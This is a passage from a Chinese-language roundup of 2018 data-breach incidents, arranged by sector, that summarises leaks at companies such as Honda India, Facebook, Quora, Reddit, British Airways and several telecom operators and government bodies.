暴露的S3存储桶包含有大量的敏感数据,涉及从2015年至今向BCCI提交赛季参赛申请的约1.5万~2万印度人。泄漏的信息包括:注册过球员的登记表、选票、银行单据等扫描件及其亲属的姓名、出生日期、出生地、永久地址、电子邮箱地址、手机号码/固定号码、医疗记录、出生证明号码、护照号码、SSC证书号码、PAN卡号码及各种扫描件等。

2.本田汽车泄露敏感数据

2018年5月30日,Kromtech安全中心再次披露了本田汽车公司(HONDA)在印度的子公司——本田印度(HondaIndia)因不安全AWS S3存储桶泄露了超过5万名客户的个人详细信息。

由于公司意外的将超过5万名HondaCONNECT移动应用程序用户的个人详细信息存储在了两个可公开访问的Amazon S3存储桶中,这使得黑客窃取这些数据成为了可能。Kromtech安全中心的研究人员Bob Diachenko发现,能够被公开访问的信息包括用户及其可信联系人的姓名、电话号码、密码、性别和电子邮箱地址,以及有关他们汽车的信息,包括VIN、Connect ID等。

3.环球唱片被爆泄露敏感数据

2018年5月30日,Kromtech安全中心披露了成立于1912年的全球音乐巨头——环球唱片(UniversalMusic Group,UMG)因为受到其承包商的牵连,暴露了自己的内部FTP凭证、数据库跟密码和AWS配置详细信息,包括访问密钥和密码。

在与环球唱片取得联系后,该公司迅速进行了回应并解决了问题。

4.S3存储桶配置错误,暴露52.7万美国选民个人信息

2018年10月,UpGuard网络风险团队透露,一个归属于美国茶党爱国者公民基金(Tea PartyPatriots Citizens Fund,TPPCF)的亚马逊S3存储桶因为一个配置错误,意外暴露了包括全名和电话号码在内的52.7万选民的个人敏感数据。暴露的数据中还包括战略文件、呼叫源文件、营销资产和其他一些文件,这些文件揭示了TPPCF将美国选民在政治上动员起来的集中努力,这一努力最终帮助唐纳德?特朗普(Donald Trump)赢得了美国总统大选。

5.销售背锅!AWS官方人员导致GoDaddy数据泄漏

2018年8月,UpGuard网络风险小组近日发现了重大的数据泄露,涉及的文件似乎描述了在亚马逊AWS云上运行的GoDaddy基础设施,并采取了保护措施,防止将来有人利用该信息。泄露的这些文件放在公众可访问的亚马逊S3存储桶中,包括成千上万个系统的基本配置信息以及在亚马逊AWS上运行那些系统的定价选项,包括不同情况下给予的折扣。泄露的配置信息包括主机名、操作系统、“工作负载”(系统干什么用的)、AWS区域、内存和CPU规格等更多信息。实际上,这些数据直接泄露了一个规模非常大的AWS云基础设施部署环境,各个系统有41个列以及汇总和建模数据,分成总计、平均值及其他计算字段。还似乎包括GoDaddy从亚马逊AWS获得的折扣。

6.美国软件公司AgentRun意外泄露众多保险公司客户个人敏感信息

2018年5月,据外媒ZDNet报道,美国软件公司AgentRun在最近意外暴露了成千上万保单持有人的个人敏感信息,而究其原因是因为一个未加密的Amazon S3存储桶。

ZDNet指出,不安全的存储桶没有使用密码保护,任何人都可以对其进行访问。该Amazon S3存储桶包含了大量的缓存数据,涉及数千名不同保险公司客户的个人敏感信息,包括类似Cigna和SafeCo Insurance这样的大型保险公司的客户,遭泄露的信息可能包括保险单文件、健康和医疗信息、各种证件的扫描件以及一些财务数据。

在整个数据泄露持续的一小时中,可被公众访问的数据包括:保单文件包含详细的保单持有人个人信息,如姓名、电子邮箱地址、出生日期和电话号码。在某些情况下,一些文件还显示了收入范围、种族和婚姻状况,甚至还附上了空白的银行支票。对于扫描件而言,涉及到各种证件,如社会安全卡片、医疗卡、驾驶执照、选民证和军人证件;医疗记录文件则包含了可以确定保单持有人医疗状况的各种信息,包括个人的处方、剂量和费用。

(二) 澳大利亚16岁高中生数次入侵苹果服务器,下载90G文件

2018年8月,澳大利亚一名16岁高中生曾通过家中电脑成功入侵苹果服务器,在随后的一年时间里,他又数次入侵,下载了约90GB的重要文件,并访问过用户账号。

据悉,该少年在黑客界颇为有名。在发动攻击时,他使用了VPN和其他工具来避免被追踪。但百密一疏,该少年使用的MacBook笔记本电脑的序列号被苹果服务器所记录。

(三) 德国托管服务商DomainFactory大量客户数据遭外泄

2018年7月,DomainFactory公司在公告中指出,一名匿名黑客在DomainFactory的技术支持论坛上发帖称,他已经成功侵入了DomainFactory的客户数据库,并分享了几名DomainFactory客户的内部数据作为证据。发现这篇贴子后,该公司立即对其论坛进行了离线处理并展开了调查。调查结果显示,黑客的说法并非虚构。

DomainFactory最终确认了这一泄露事件,并公布了能够被黑客所访问的数据类型,同时向客户发出了更改密码建议。泄露的数据包括:客户名称、公司名称、客户账户ID、实际住址、电子邮件地址、电话号码、DomainFactory手机密码、出生日期、银行名称及账号等。

(四) 芬兰某公共服务网站数据泄露,超过13万芬兰公民受影响

2018年4月,据芬兰媒体Svenska Yle的报道,芬兰通信管理局(FICORA)于2018年4月6日通过自己的网站向所有芬兰公民发出警告称,一个由赫尔辛基新企业中心(“Helsingin Uusyrityskeskus”)负责维护的网站(liiketoimintasuunnitelma[.]com)在本周二遭遇了匿名黑客的攻击,大约有13万用户的账户用户名和密码被窃取,同时被窃取的还包括其他一些机密信息。从受害者数量来看,这将是该国有史以来发生的第三大数据泄露事件。

FICORA表示,该网站并没有对存储的任何信息进行加密,无论是用户名还是密码都采用明文形式进行储存,这使得网络犯罪分子更容易利用它们。由于用户名和密码是以明文形式泄露的,因此赫尔辛基新企业中心董事会主席JarmoHy?kyvaara建议,如果有用户在其他信息系统或网络服务使用了相同用户名和密码,应该立即对这些密码进行修改。而一旦Liiketoimintasuunnitelma网站重新恢复上线,还应该立即对该网站的账户密码进行修改。

(五) 联想的一台笔记本失窃了:它拥有成千上万名员工的姓名、月薪、银行账号

2018年12月,联想公司通知亚太区员工:一台存储有众多员工未加密数据的办公笔记本失窃!里面有成千上万名员工的工资单信息,包括亚太区员工的姓名、月薪和银行账号。

根据外媒披露,新加坡一名联想员工由公司发放的一台笔记本电脑失窃;要命的是,里面有亚太区成千上万员工的一大堆未经加密的工资单数据。

关于这次重大事故的细节是联想工作人员告诉称,他们对这个严重的错误感到困惑不解。联想已向员工发去了道歉信,承认这个重大的安全问题。

(六) 数千台Etcd服务器可任意权限访问,暴露750MB密码和密钥

2018年3月,据外媒报道,安全研究人员 Giovanni Collazo 通过 Shodan 搜索引擎发现近 2300 台安装了“etcd”组件的服务器暴露在互联网上,利用一些简单脚本即可从中获取登录凭证。目前Collazo 经过测试已经成功地从这些服务器上检索到了来自 1,485 个 IP 、约 750 MB 的数据,其中包括 8,781 个密码、650 AWS 访问密钥、23 个密钥和 8 个私钥。

虽然 Collazo 并没有测试这些凭证,但其中一些被推测是有效的,有可能会被攻击者用来侵入系统。此外,根据 Collazo 的说法,任何人只需几分钟时间就可以获得数百个可用于窃取数据或执行勒索软件攻击的数据库证书列表。

(七) 英国电商软件Fashion Nexus爆漏洞,多个品牌网站140万购物者隐私泄露

2018年8月,许多在英国服饰和配饰在线购物网站上消费的购物者发现他们的个人信息已经被确认遭到了泄露。此次数据泄露事件涉及多个英国时尚品牌,而导致时间发生的根源来自于他们共同的IT服务提供商Fashion Nexus。

由于Fashion Nexus及其姊妹公司WhiteRoom Solutions在安全管理方面的问题,导致一台服务器能够被公开访问。安全研究员TaylorRalston指出,在这台服务器上包含有一个共享数据库,其中涉及众多在线购物网站消费者的个人详细信息。总的来说,在线暴露的信息包含了大约140万消费者的个人信息,包括md5哈希密码、密码、Salt值、姓名、电子邮件地址、电话号码和其他一些数据。值得庆幸的是,并不涉及明支付卡信息。

(八) 云泄露最前线:

1.“不设防”的MongoDB暴露6600万条数据

2018年12月,安全研究人员发现,超过6600万数据在一个没有保护的数据库中,只要知道网址任何人都可以访问,而这些数据似乎来自LinkedIn个人资料。数据缓存包括可识别用户的个人详细信息,可帮助攻击者创建难以识别的网络钓鱼攻击。

根据Hacken网络风险研究总监BobDiachenko的说法,这些数据通过MongoDB公开了这个问题,无需身份验证即可进行访问。这66,147,856条特别的记录包含全名,个人或企业电子邮件地址,用户的位置详细信息技能,电话号码和工作经历,甚至还有个人LinkedIn个人资料的链接。

目前研究人员无法确定该数据库的所有者,但该数据库现在已不再在线,但并不排除它再次出现在网络上的可能性。

2.Adapt.io 123GB数据可公开访问

2018年11月5日,Hacken公司的安全专家发现了一个可公开访问且没有设置密码的MongoDB数据库,其大小为123GB,包含9,376,173条个人信息记录。泄露的信息包括:公司名、公司介绍、姓名、头衔/级别/职位、行业、公司规模、公司收入、电话号码、公司吸纳有联系人、电子邮件等。

经过仔细审查之后,Hacken公司的安全专家得出结论,这个数据库来自一个名为“Adapt.io”的商业服务网站。根据其网站的描述:“Adapt提供了数以百万计的商业联系方式。Adapt的免费工具可帮助您通过电子邮件、电话和众多联系人来丰富您在任何网站上的商业信息。”

3.FIESP近两亿条记录泄露

11月12日,Hacken公司的安全专家在使用Binaryedge.io平台审核可公开访问的Elasticsearch数据库的搜索结果时,发现了似乎是由巴西圣保罗州工业联合会(FIESP)编制的个人信息记录。FIESP隶属于巴西国家产业联合会,包括133个商业协会,涵盖13万个行业,这些行业占巴西国内生产总值(GDP)的42%。

存储在可公开访问的Elasticsearch数据库中的记录,总计数为180,104,892条,其中至少有3个数据集(FIESP、celurares和externo)包含巴西公民的姓名、个人身份证号码、纳税人登记证明、性别、出生日期、完整地址、电子邮箱地址、电话号码等个人信息。

Hacken公司的安全专家表示,他们在向FIESP发出通知后并没有收到任何回复。该数据库最终是在该公司的巴西粉丝Paulo Brito通过电话与FIESP取得联系之后,才得到离线处理的。

二、 政府机构
(一) 法国外交部称紧急联络人信息数据库遭黑客入侵

2018年12月,法国外交和欧洲事务部发表了一份声明,宣称其计算机系统遭黑客入侵,访问并保存了紧急联络人信息的数据库,导致众多个人信息被泄露。据悉,大概54万份个人档案信息在事件中被窃,其中包含姓名、电话号码和电子邮件地址等信息。

目前,这一安全漏洞已得到修复。该部还在事件发生72小时内联系了法国数据监管机构CNIL。

2010年,法国外交和欧洲事务部就创建了一项名为“阿丽亚娜”(Ariane)的紧急服务——如果你打算前往不安全的国家时,可以在“阿丽亚娜”平台上进行登记,将这一信息告诉外交和欧洲事务部。这样一来,你就会收到安全简报,如果当地有危机发生,法国外交和欧洲事务部将会联系你,而且会保存紧急联络人信息,以防你在出境时遇到了意外情况。

此次被泄露就是“阿丽亚娜”平台,保存紧急联络人信息的数据库。

(二) 美国监狱电话监控供应商Securus被黑,大量数据遭窃取

2018年5月,一位匿名黑客从Securus窃取了大量数据,Securus是一家为监狱囚犯提供电话服务的公司,并且为执法部门提供追踪电话使用服务。窃取的数据包括电子表格,上面的标志显示文档属于警方,里面有2800个用户名,还有邮件地址、手机号、密码、安全提示问题,数据最早可以追溯到2011年。

(三) 美国政府网站HealthCare.gov被黑,7.5万人敏感信息泄露

2018年10月,负责HealthCare.gov网站的机构称他们在一个与HealthCare.gov交互的政府计算机系统中发现了一起黑客攻击行为,导致大约7.5万人的敏感个人数据遭到泄露。

其设计由美国联邦医疗保险暨补助服务中心(CMS)监督,并由多个联邦承包商建立。该网站投资高达8亿美金。CMS的管理在声明中说,“我们正努力尽快查明可能受到影响的个人,以便我们能够通知他们,并提供信贷保护等资源。”

(四) 印度国家生物特征库Aadhaar疑似数据泄漏

2018年3月据相关媒体报道,法国一名安全研究员Baptiste Robert通过推文宣称,他在印度政府和非政府机构网站上共找到了2万张Aadhaar卡的电子图片(PDF或jpeg格式),而整个过程只花了约3个小时的时间。

Aadhaar目前拥有着世界上最大的生物识别数据库,已经收集了超过十亿印度公民的虹膜扫描和指纹。随后,印度唯一身份认证管理局(Unique Identification Authority of India, UIDAI)却重申Aadhaar“依然安全可靠”,并将安全漏洞的报告驳回,称其为“不负责任”和“远离真相”

(五) 印度某政府网站意外泄露大量公民敏感信息,目前仍未修复

2018年4月,安全研究员SrinivasKodali报告了一起数据泄露事件,受影响的是一个隶属印度安得拉邦的政府网站。根据Kodali的描述,遭泄露的数据包括Aadhaar号码、银行分行、IFSC代码和帐号、姓名、地址、身份证号码、手机号码、配给卡号码、职业、宗教信仰和种姓信息。

虽然印度政府和UIDAI(印度唯一身份认证中心)曾辩称仅是Aadhaar卡号,并不包含印度公民的所有个人信息。但在印度,Aadhaar号码与其他的个人信息相关联是一个不争的事实。Kodali强调,不法黑客具备生成这种关联列表的能力,这些信息完全可以被用来锁定某个单一的个人。另外,这个数据库是公开可用的,并且允许任何人在未经授权的情况下访问。

(六) 印度全民个人信息遭泄漏,售价不足6英镑!

2018年1月根据印度《论坛报》(Tribune)进行的调查显示,超过10亿印度公民的个人资料(包括指纹和虹膜等生物识别信息)正在在线出售,售价不足6英镑。

这些数据是存储在世界上最大的国营生物识别数据库——Aadhaar中。同时在线出售的还有可用于生成虚假Aadhaar卡的软件。此前,印度政府认为,Aadhaar项目将帮助把大量的印度公民纳入数字经济之中,会对印度的社会发展产生广泛的意义,下令强制该国公民必须在2017年12月31日之前将Aadhaar号码与自己的银行账户、手机号码、保险账户、永久性账号卡(PAN Card)以及其他服务绑定起来。但有批评者认为,该系统的好处被夸大了,并正在面临不断增长的安全风险。

三、 电信运营商
(一) T-Mobile又泄露超过200万客户数据

2018年8月,T-Mobile公司披露,在黑客获得对其系统的访问权后,窃取了“一小部分”客户的个人信息,可能包括个人信息,如姓名,帐单邮政编码,电话号码,电子邮件地址,帐号和帐户类型。其代表表示,今次数据泄露违规行为影响其7700万客户中约3%的客户,约占230万人。

其实,在2016年6月份时已经发生了一起数据泄露事件,T-Mobile的一名员工在T-Mobile捷克共和国窃取了超过150万的客户记录,以便出售以获取利润,最终使得捷克共和国警方介入调查。但该公司表示,数据泄露是被其中一名员工窃取,该员工在尝试销售数据时被捕获。

(二) Voxox短信数据库遭泄,暴露短信认证安全问题

一家位于加州圣地亚哥的通信公司Voxox,由于服务器没有密码保护,导致任何知道该去哪儿窥视的人都能看到近乎实时的短信数据流。驻柏林的安全研究员塞巴斯蒂安·考尔(SébastienKaul)发现,Voxox的一个二级域名指向了这个无遮无拦的服务器。更糟糕的是,这个在亚马逊Elasticsearch上运行的数据库还配置了Kibana前端,使得其中的数据易于读取、浏览以及按照姓名、手机号码和短信内容进行检索。

此安全失误导致一个庞大的数据库遭到泄露,该数据库中的数千万条短信中包含了密码重置链接、双因素认证代码以及快递通知等等。

在TechCrunch发出问询后,Voxox已将数据库脱机。在关闭时,该数据库上似乎拥有年初以来的逾2600万条短信。不过,我们可以从数据库的可视化前端查看到平台每分钟处理的短信数量,它表明实际的数字可能更高。

(三) 电信巨头加拿大贝尔公司数据又被泄,近10万用户受影响

2018年1月,加拿大最大的电信公司加拿大贝尔公司 (Bell Canada) 开始通知10万名消费者称他们的个人数据已遭攻陷。贝尔公司指出,消费者的姓名和邮件地址遭“非法访问”,但加拿大多家新闻报告称黑客可能也获得了电话号码、用户名和账户号。然而,贝尔公司表示尚未有证据表明信用卡或银行信息遭攻陷。

这是贝尔公司第二次遭遇数据泄露事件。2016年5月,该公司证实称约190万个活跃邮件地址和约1700个姓名和活跃电话号码遭黑客访问。目前尚不清楚这两起事件之间是否存在关联。

(四) 泰国最大的4G移动运营商TrueMoveH遭遇数据泄露

2018年4月,泰国最大的4G移动运营商TrueMove H遭遇数据泄露,AWS上46000人的数据被直接曝光在网上,包括驾驶执照和护照,以及身份证件的扫描件等。

安全研究人员Niall Merrigan发现数据泄露问题之后,试图将此问题告知TrueMove H,但运营商没有回应。Merrigan透露,该AWS存储桶包含总计32GB的46,000条记录。

在媒体曝光之后,TrueMove H发布了一份声明,澄清数据泄漏影响了其子公司I True Mart。一位法律专家表示,TrueMove H可能面临数据泄露的惩罚,而安全专家呼吁电信运营商开始引入更完善的数据保护措施。

(五) 俄罗斯电信公司意外暴露数千名富豪客户个人信息

2018年1月,据路透社(Reuters)报道,数千名在一家区域互联网服务提供商完成注册的莫斯科富人可能已经暴露了他们的个人信息,这其中就包括他们的姓名、家庭住址和手机号码等。

报道称,这起备受关注的数据泄露事件的所有受害者全都是俄罗斯互联网提供商AkadoTelecom的客户,这是一家由亿万富翁维克托?维克塞尔伯格(ViktorVekselberg)拥有的大型电信网络。目前,该公司表示已对此次事件展开调查。

(六) 黑进TalkTalk公司的两黑客分别被判1年、10个月

2018年11月,两名来自英格兰斯塔福德郡塔姆沃思的男子因参与2015年TalkTalk公司黑客攻击事件而被判入狱。据悉,21岁的康纳·奥尔索普(Connor Allsopp)与23岁的马修·汉利(Matthew Hanley)两人已对黑客指控认罪。奥尔索普被判处8月的监禁,而汉利被判处12月的监禁。

2015年10月,TalkTalk电信集团公司公开披露,其服务器受“持续网络攻击”,而且,黑客窃取了该公司客户的姓名、住址、出生日期、电子邮箱地址及电话号码信息,且窃取了1.5万用户的财务数据。攻击者还曾试图勒索电信公司TalkTalk首席执行官狄多·哈丁(DidoHarding)。

(七) 美国电信巨头Comcast爆漏洞,暴露2650万用户个人信息

2018年8月,研究员发现Comcast Xfinity无意中暴露了超过2650万名用户的家庭住址和社会安全号码。隶属于这家全美第二大互联网服务提供商的在线客户门户网站上被发现存在两个此前未被报告的漏洞,这使得即使是不具备太多专业技能的黑客也可以很容易地访问这些敏感信息。

在BuzzFeed News向Comcast报告了这项调查结果之后,该公司对漏洞进行了修复。Comcast发言人David McGuire告诉BuzzFeed News:“我们迅速对这些问题进行了调查,在几个小时内我们修复了这两个漏洞,消除了研究人员所描述的潜在威胁。我们非常重视用户的安全,目前没有证据表明漏洞曾被用来攻击Comcast的客户。”

(八) 瑞士电信证实80万数据被盗,涉全国1/10公民信息

2018年2月,一个身份不明的用户访问了Swisscom 客户的姓名、地址、电话号码和出生日期等信息,目前Swisscom认为该用户是通过其销售合作伙伴获取数据的。

据 IBTimes 报道,瑞士电信 (Swisscom) 于 2 月 7 日承认其用户数据在去年年底遭到破坏,约80 万名客户(占瑞士总人口的 10 %)的个人信息遭到泄露。不过 Swisscom 承诺此次事件不会涉及用户任何敏感信息(比如密码、会话或支付数据)。此外,为了更好地保护第三方公司对个人数据的访问,Swisscom 做出了一些重要改变,其中包括:相关合作伙伴公司的访问权限已被立即封锁;在销售合作伙伴账户中引入双因素认证,同时削减运行大容量查询的能力;第三方账户上的任何异常活动都会触发警报并阻止访问。

(九) 西班牙电信Telefónica存漏洞,可暴露数百万用户的完整个人数据

2018年7月,据El Espanol报道,西班牙电信(Telefónica)在16日凌晨被西班牙消费者协会FACUA发现存在一个安全漏洞。透过这个漏洞能够访问数百万用户的完整个人数据。暴露给黑客的信息包括固定电话和移动电话用户的全名、国家身份证号码、家庭住址、银行记录和通话记录,而所有这些数据都可以以电子表格的形式下载。

Telefónica表示,他们在接到这一通知后,立即对该漏洞进行了修复。另外,也向有关当局进行了报告。而El Espanol称,因为该漏洞而可能遭到泄露的数据包括用户的个人身份信息和支付卡信息,并且漏洞极其易于利用,即使是不具备高技术水平的入侵者也能够访问对它们进行访问。

有专家表示,“Telefónica作为全球十大电信公司之一,收入超过530亿美元。令人惊讶的是,Telefónica用户的数据居然可以轻松下载为未加密的电子表格。”

(十) 印度国有运营商BSNL内网遭入侵,4.7万员工个人信息随意浏览

2018年3月,根据《印度经济时报(The Economic Times,ET)》及多家国外媒体的报道,法国安全研究人Robert Baptiste声称已获得了印度国有电信运营商Bharat Sanchar NigamLimited(BSNL)内部网络数据库的访问权,该数据库包含超过4.7万名员工的详细信息。

早前,Baptiste还与ET分享了一个包含BSNL离职和现任员工姓名、职称、密码、手机号码、出生日期、退休日期、电子邮件地址等详细信息的数据库样本。ET随后从数据库中调取了六名员工的个人信息,并通过电话验证了他们的身份属实。

Baptiste已通过Twitter与BSNL进行了接触,并通知了他们关于这个问题。该公司的IT团队与他进行了讨论,最终确认了问题的严重性。目前,大部分漏洞已经被修复,而一些网站也已经被删除。

据Baptiste反馈,这个问题最初是由印度安全研究员Sai KrishnaKothapalli在两年前报道的,但在当时并没有得到BSNL的答复。

四、 互联网
(十一) Facebook披露严重漏洞:黑客可控制5000万用户账号

2018年9月,Facebook周五宣布,该公司发现了一个安全漏洞,黑客可利用这个漏洞来获取信息,而这些信息原本可令黑客控制约5000万个用户账号。在披露这一消息之前,Facebook股价已经下跌了1.5%左右,消息传出后进一步走低,到收盘时下跌2.59%报164.46美元,盘中一度触及162.56美元的低点。

Facebook发布博文称,该公司的工程团队发现,黑客在Facebook的“View As”功能中找到了一个代码漏洞。Facebook之所以能发现这个漏洞,是因为该公司在9月16日注意到用户活动大增。Facebook表示将暂时关闭View As功能,将对其安全性进行审查。Facebook表示已通知美国联邦调查局(FBI)和爱尔兰数据保护委员会(Irish Data ProtectionCommission)等执法机关,目的是解决任何有关一般数据保护条例(GDPR)的问题。

(十二) Facebook严重漏洞调查:2900万用户数据失窃,易受针对性钓鱼影响

2018年10月13日,Facebook周五宣布,网络攻击者利用一个自动程序窃取了Facebook约2900万个账户的数据。该公司表示,将在未来几天向受影响用户发送信息,告知他们在攻击中被访问了哪些类型的信息。

据介绍,攻击者从1400万用户中获取了个人资料的详细信息,如出生日期、雇主、教育历史、宗教信仰、使用的设备类型、跟踪的页面以及最近的搜索和位置登记。对于其他1500万用户,入侵仅限于姓名和联系方式。此外,攻击者还可以看到约40万用户的帖子和好友列表。

根据今年5月欧盟颁布的“通用数据保护条例”,Facebook必须在得知妥协后72小时内发出通知。Facebook的主要欧盟数据监管机构爱尔兰数据保护专员上周对这起泄密事件展开了调查。包括美国康涅狄格州和纽约州在内的其他司法管辖区的有关部门也在调查这起袭击事件。

(十三) Facebook隐私泄露人数上升至8700万,用户主要集中在美国

2018年4月,Facebook首席技术官Mike Schroepfer发表的一则博客文章称,我们认为Facebook上约有8700万用户,大约81.6%是美国用户,或许受到Cambridge Analytica获取数据的影响。此前,受到此次事件影响的Facebook用户数预计在5000万左右,8700万人的数字较之前的预估有了大幅提升。

由Cambridge Analytica大数据分析公司所引发的Facebook用户数据大面积泄漏事件目前仍在发酵,尽管Facebook方面已经公布一系列措施已改善用户数据安全管理,但关于此事件的调查仍在进行中。

(十四) Facebook又泄露700万用户个人照片,可能面临16亿美元罚款

2018年12月,据外媒报道,社交网络巨头Facebook可能面临超过16亿美元的罚款,因为它刚刚在一次安全入侵事件中暴露了近700万用户的个人照片。爱尔兰数据保护委员会(IDPC)表示,它已对这个安全入侵事件是否遵守了一般数据保护法(GDPR)的相关规定展开了调查。其中有些被曝光的照片是用户从未在该社交网络上分享过的照片。

电子隐私信息中心(Electronic PrivacyInformation Center)执行董事马克-罗滕贝格(MarcRotenberg)称,这一安全入侵事件可能会让Facebook违反它在2011年与美国贸易监管机构签署的一项协议,该协议要求Facebook改善其隐私做法,否则将面临罚款。

(十五) 谷歌关闭个人版Google+:因50万用户数据遭到曝露

2018年10月9日,据报道,谷歌周一在公司博客中宣布,公司将关闭旗下社交网站Google+的消费者版本。此前该公司宣布,Google+在长达两年多时间里存在一个软件漏洞,导致最多50万名用户的数据可能曝露给了外部开发者。

谷歌称,公司今年3月就已发现这个漏洞并推出补丁加以修复,并表示没有证据表明用户数据被滥用,也并无证据表明任何开发者明知或利用了这个漏洞。

受此影响,谷歌母公司Alphabet股价下跌1.02%,报收于1155.92美元。

(十六) Google+再曝严重漏洞影响5250万用户,将被提前关闭

2018年12月,谷歌表示,在Google+ People API 中找到另外一个严重的安全漏洞,可导致开发者窃取5250万名用户的个人信息,包括姓名、邮件地址、职业和年龄。将导致谷歌将在2019年四月,即比计划时间提前四个月关闭该社交服务。

这个易受攻击的 API 被称为“People:get”,旨在让开发人员请求和用户资料相关的基本信息。然而,谷歌在11月发布的软件更新导致 Google+ People API 中出现 bug,导致即使在用户资料被设置为“非公开”的情况下,app 仍可查看用户信息。

(十七) 供应商产品感染恶意软件,致使Ticketmaster英国网站客户信息泄露

2018年6月,票务销售公司Ticketmaster的英国网站宣布,他们在Ticketmaster网站相关产品中发现了恶意软件,部分客户的个人信息或付款信息或许已因此遭到泄露。

Ticketmaster是一家大型票务销售公司,总部位于美国加利福尼亚州,运营点遍布全球,主营票务类型为娱乐、体育。根据其官方公告,6月23日Ticketmaster UK在由Ticketmaster的外部第三方供应商Inbenta Technologies托管的客户支持产品中发现了恶意软件。发现恶意软件后,他们禁用了所有Ticketmaster网站上的Inbenta产品。尽管如此,部分客户的个人信息已经因此泄露,可能暴露的个人信息包括:姓名,地址,电子邮件地址,电话号码,付款详情和Ticketmaster登录详细信息。

(十八) 黑客售8万个Facebook用户信息:每个账号售价10美分

2018年11月,据BBC报道,黑客称其已经窃取和公布了至少8.1万个Facebook用户账号的私人信息,并以每个账号10美分的价格出售其所盗取的数据。

BBC获悉,在个人细节信息被盗的用户中,很多都是乌克兰和俄罗斯用户,但也有一些来自英国、美国、巴西及其他国家。黑客以每个账号10美分的价格出售其所盗取的数据,但他们此前发布的广告现已下线。

此次黑客事件最早是在今年9月曝光的,当时一名昵称为“FBSaler”的用户在一个英语在线论坛上发布帖子称:“我们出售Facebook用户的个人信息。我们的数据库里有1.2亿个账号。”随后,网络安全公司Digital Shadows代表BBC进行了调查,并确认被在线发布的8.1万多个账号中包含了用户私人信息。

(十九) 美版“知乎”Quora遭黑客入侵:1亿用户数据裸奔

2018年12月,据报道,美国社交问答Quora网站称,该公司已经聘请“顶尖数字法证和安全公司”,并且已经上报执法部门。他们上周五发现其用户数据遭到身份不明的第三方非法获取。亚当在博客中表示,大约1亿Quora用户可能有大量信息遭到泄露,包括:帐号信息、公开内容和活动,以及非公开内容和活动。

Quora表示,匿名提交问题和答案的用户不会受此影响,因为Quora并没有存储任何与匿名用户有关的信息。

(二十) 全球最大同性社交软件Grindr存漏洞,可泄露用户信息及位置

2018年3月,美国NBC的一份报道称,一款名为Grindr的交友应用程序存在两个安全问题,它可以暴露超过300万用户的信息,包括那些选择不共享这些信息的人的位置数据。

此漏洞是AtlasLane公司的首席执行官TreverFaden在创建了一个名为C*ckblocked的网站后发现的,他的网站在输入Grindr用户名和密码后可查看谁屏蔽了他们。但用户登录成功后,Faden就可以访问用户档案中没有公开的用户数据,包括未读消息、电子邮件地址、删除的照片以及用户的位置信息。

Grindr为全球最大的同性社交网站,今年1月初被北京昆仑万维科技股份有限公司收购,其拥有的用户超过几百万遍布234个国家。

(二十一) 社交新闻网站Reddit遭黑客攻击,2007年之前的备份数据泄漏

2018年8月,美国社交新闻网站Reddit周三宣布,该公司的几个系统遭到黑客入侵,导致一些用户数据被盗,其中包括用户目前使用的电子邮箱以及2007年的一份包含旧加密密码的数据库备份。

Reddit称,黑客获取了旧数据库备份的一个副本,其中包含了早期Reddit用户数据,时间跨度从2005年该网站成立到2007年5月。Reddit表示,此次攻击是通过拦截员工的短信实现的,该短信中包含了一次性登录码。该公司还补充道,他们已经将此事通知受影响的用户。

(二十二) 实时聊天供应商被黑,致使西尔斯、达美航空、百思买用户信用卡泄漏

2018年4月,美国百货连锁公司西尔斯 (Sears)、达美航空 (Delta Airlines) 以及百思买 (Best Buy) 因共用的软件提供商被黑而导致客户的支付卡详情遭暴露。

这家被黑的公司位于美国加州圣荷西,提供多种客户支持服务,包括实时聊天系统和人工智能聊天机器人等。

达美航空公司表示,攻击者设法窃取的信息包括持卡人姓名、地址、卡号、CVV号码以及有效期。但该公司虽然并未说明受影响的乘客人数有多少,但表示攻击者并未获得访问护照或政府身份详情的权限,同时也未获得访问托管在 SkyMiles 计划中的数据的权限。

(二十三) 亚马逊解雇擅自向第三方商家披露用户信息的员工

2018年10月,亚马逊称公司解雇了一名擅自向网站上的第三方商家披露消费者电子邮件地址的员工,该员工的行为违反了亚马逊的政策。亚马逊发言人在声明中说:“须对此事负责的个人已被停职,我们支持执法部分采取诉讼。”

根据发送给消费者的通知,亚马逊已经提醒购物者但表示并不需要采取更改密码等措施。公司并没有披露受影响消费者数量。

(二十四) 亚马逊因“技术错误”泄漏部分客户信息,包含姓名、邮件地址

2018年11月,据外媒报道,亚马逊向受影响客户发送的电子邮件显示,由于“技术错误”导致一些客户的姓名和电子邮件地址遭到泄漏。周三上午,数人在网上分享了这些电子邮件的截图。

亚马逊在一份声明中说,“我们已经解决了这个问题,并通知了可能受到影响的客户。”

亚马逊没有回答有关有多少客户受到这一错误的影响,也没有回答有关信息公开时间的问题。亚马逊一位发言人告诉CNBC,亚马逊的网站和系统都没有被破坏。该公司没有透露客户信息的可见位置。

五、 交通物流
(二十五) 38万笔用户支付信息失窃,英国航空公司道歉

2018年9月,英国航空公司7日为乘客信息失窃道歉,承诺将赔偿遭受经济损失的用户。英国政府已知道这起“网络攻击”,正调查事件经过。

据英航的母公司国际航空集团6日透漏,8月21日至9月5日,英航网站及手机应用程序遭受“黑客”攻击,涉及大约38万笔用户网上支付交易;用户姓名、住址、电子邮箱账号、信用卡卡号及有效期、安全码泄露,航班信息和护照信息没有失窃。

英航董事长克鲁斯告诉记者,黑客作案手法“极其复杂”,为英航在线运营20多年来所未见。黑客没有破坏英航加密系统,而是用“另一种非常复杂”的方式侵入英航系统并获取用户信息。

(二十六) 澳洲最大汽车共享服务公司GoGet被黑客入侵,会员信息惨遭泄漏

2018年2月,GoGet公司向其客户发出警告,称他们的车辆预定系统在去年遭到了黑客的入侵,在去年7月27日之前注册的会员个人信息已经遭到泄露。

GoGet是澳大利亚首家,也是规模最大的一家汽车共享服务公司,业务覆盖澳洲五大主要城市,这包括:悉尼、墨尔本、堪培拉、布里斯班和阿德莱德。

泄露信息的多少取决于GoGet用户在填写会员登录表时录入的具体个人资料内容,这可能包括:姓名、家庭住址、电子邮箱地址、电话号码、出生日期、驾驶执照详细信息、就业单位、紧急联系人的姓名和电话号码以及GoGet管理帐户详细信息。

(二十七) 航运巨头马士基旗下子公司近半员工个人信息泄漏

2018年3月,根据《丹麦海军时报(MaritimeDanmark)》的报道,航运公司SvizterAustralia有大约500人受到了数据泄露事件的影响,而遭到泄露的个人信息可能包括税务档案号码、亲属详情以及退休金账户信息。

初步调查结果显示,在2017年5月该公司的三个关键电子邮箱账户遭到了匿名黑客的入侵,约6万封电子邮件被秘密地自动转发到了两个公司外部电子邮箱账户。

